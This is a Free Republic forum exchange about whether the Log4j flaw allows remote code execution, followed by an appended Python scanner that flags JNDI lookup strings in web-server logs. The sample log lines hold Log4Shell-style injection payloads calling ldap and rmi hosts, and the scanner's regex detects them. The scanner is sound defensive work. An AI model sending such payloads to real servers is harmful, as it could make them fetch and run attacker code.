Free Republic
News/Activism

To: vikingd00d
“The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.”

You just proved it's not performing remote code execution. There's nothing in Log4j that lets you run any code. It does a lookup, but that is not executed code or arbitrary code.

8 posted on 12/12/2021 9:39:11 PM PST by ConservativeMind (Trump: Befuddling Democrats, Republicans, and the Media for the benefit of the US and all mankind.)


To: ConservativeMind

>>There’s nothing in Log4j that lets you run any code.

Did you miss THIS?

“And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.”

Downloading and running arbitrary code seems like a bad idea.


9 posted on 12/12/2021 9:44:43 PM PST by vikingd00d (chown -R us ~you/base)
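As an added example that belongs to neither poster nor the article they quote: a small Python scanner a defender can run over web-server logs to flag the lookup strings that trigger the remote JNDI lookups the quoted article describes. The log lines, hostnames and addresses are constructed placeholders, and the scheme list (ldap, ldaps, rmi, dns) is this example's choice of network-reaching JNDI providers to watch for.

```python
import re
from typing import Dict, List

# Constructed sample log lines for this example; hosts and addresses are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2021:21:39:11 -0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Dec/2021:21:44:43 -0800] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://lookup.example.invalid/a}"
10.0.0.7 - - [12/Dec/2021:21:45:00 -0800] "GET /?q=${date:yyyy} HTTP/1.1" 200 10 "-" "curl/7.79"
10.0.0.8 - - [12/Dec/2021:21:46:10 -0800] "GET /x HTTP/1.1" 404 0 "-" "${JNDI:RMI://192.0.2.23:1099/obj}"
"""

# A Log4j lookup whose resolver goes out over the network (directory or naming
# services). Matched case-insensitively so mixed-case spellings are not missed.
REMOTE_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)


def _lookup_text(line: str, start: int) -> str:
    """Return the ${...} expression beginning at `start`, honouring nested braces."""
    depth = 0
    for i in range(start, len(line)):
        if line[i] == "{":
            depth += 1
        elif line[i] == "}":
            depth -= 1
            if depth == 0:
                return line[start:i + 1]
    return line[start:]  # unterminated lookup: report the rest of the line


def find_remote_lookups(log_text: str) -> List[Dict[str, object]]:
    """Scan log lines and report every remote JNDI lookup string found.

    Local-only lookups such as ${date:...} are deliberately not reported.
    """
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in REMOTE_JNDI.finditer(line):
            hits.append({
                "line": lineno,
                "scheme": m.group(1).lower(),
                "lookup": _lookup_text(line, m.start()),
            })
    return hits


if __name__ == "__main__":
    for hit in find_remote_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['lookup']}")
```

Lines 2 and 4 of the sample are reported (ldap and rmi); the `${date:yyyy}` on line 3 is a local lookup and is left alone.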



FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson